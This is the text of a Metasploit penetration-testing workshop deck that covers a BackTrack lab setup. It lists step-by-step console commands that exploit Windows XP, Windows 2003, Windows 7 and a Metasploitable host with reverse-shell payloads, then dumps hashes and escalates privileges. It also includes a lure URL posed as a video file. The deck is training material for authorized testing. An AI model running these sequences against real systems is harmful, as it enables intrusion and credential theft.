Whoami
• Just me my self : http://fl3x.us ; @fl3xu5
• InfoSec Enthusiast & Trainer
• Lecture & Assistant Manager
• CyberCrime Investigator
Why Pentest ?
• Millions of dollars have been invested in
security programs to protect critical
infrastructure to prevent data breaches *1)
• Penetration Test is one of the most
effective ways to identify weaknesses and
deficiencies in these programs *1)
What’s Penetration Testing
• A method to evaluate the security of computer system / network
• Practice ( attacking ) an IT System like a ‘hacker’ does
• Find security holes ( weaknesses )
• Bypass security mechanism
• Compromise an organization’s IT system security
Must have permission from IT system owner !
illegal activity put you in Jail
<< back|track overview
• .
The Most Advanced Linux Security Distribution
Open Source & Always be
Developed for Security Professional
Real World Pentesting Tools
What’s
• Not just a tool, but an entire framework *1)
• an Open source platform for writing
security tools and exploits *2)
• Easily build attack vectors to add its
exploits, payloads, encoders,
• Create and execute more advanced attack
• Ruby based
Metasploit Terminology
• Exploit : code that allow a pentester take some advantages
of a flaw within system,application, or service *1)
• Payload : code that we want the target system to execute
( few commands to be executed on the target system ) *1)
• Shellcode : a set of instructions used as payload when
exploitation occurs *1)
• Module : a software that can be used by metasploit *1)
• Listener : a component for waiting an incoming connection
*1)
How does exploitation works
attacker
exploit + payload
vulnerable server
1
exploit run , then payload run
2
3 Upload / Download data
Traditional PentestVs Metasploit
Public Exploit Gathering
Change offsets
Replace ShellCode
Load Metasploit
Choose the target OS
Use exploit
SET Payload
Execute
Traditional Pentest Metasploit for Pentest
Meterpreter
• as a payload after vulnerability is exploited *1)
• Improve the post exploitation
Pentest Skenario
• Set network adapter : NAT
• Firewall & Windows update : OFF
• Fresh OS installed
!
• startx
OS in the Lab
• BackTrack 5 R 3
• IP address : 172.16.150.169
• Windows Xp SP 2
• IP address : 172.16.150.165
• Windows 2003 Server
• IP address : 172.16.150.167
• Windows 7
• IP address : 172.16.150.170
• Ubuntu Linux 8.04 ( Metasploitable )
• IP address : 172.16.150.171
Windows XP Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165
• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• session -l
Windows XP Post Exploitation
• session -i 1
• meterpreter > getsystem -h
• getuid
• hashdump
Windows 2003 Server Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167
• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• session -l
Windows 7 Exploitation
• msf > use exploit/windows/browser/ms11_003_ie_css_import
• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms11_003_ie_css_import) > show options
• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169
• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi
• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169
• msf exploit(ms11_003_ie_css_import) > set LPORT 443
• msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim open the url http://172.16.150.169:80/miyabi-hot.avi
Ubuntu 8.04 Metasploitable Exploitation
• search distcc
• use exploit/unix/misc/distcc_exec
• show payloads
• set PAYLOAD cmd/unix/reverse
• show options
• set rhost 172.16.150.171
• set lhost 172.16.150.169
• exploit
Greet & Thanks To
• BackTrack Linux
• Metasploit Team ( HD Moore & rapid7 )
• Offensive Security / Metasploit Unleashed
• David Kennedy
• Georgia Weidman
References
!
!
• 1. Metasploit The Penetration Tester’s Guide : David
Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni
• 2. http://www.metasploit.com
• 3. http://www.offensive-security.com/metasploit-
unleashed/Main_Page
• 4. http://www.pentest-standard.org/index.php/
PTES_Technical_Guidelines
Challenge in 45 minutes :)
• ConnectYour Windows OS to TP LINK Access
Point over dhcp
• BackTrack 5R3VMWare setting :
• Network adapter : Bridge
• Get 4 Pictures by your self & shutdown the targets
( if you can :p )
• Win the Polo T-Shirt indobacktrack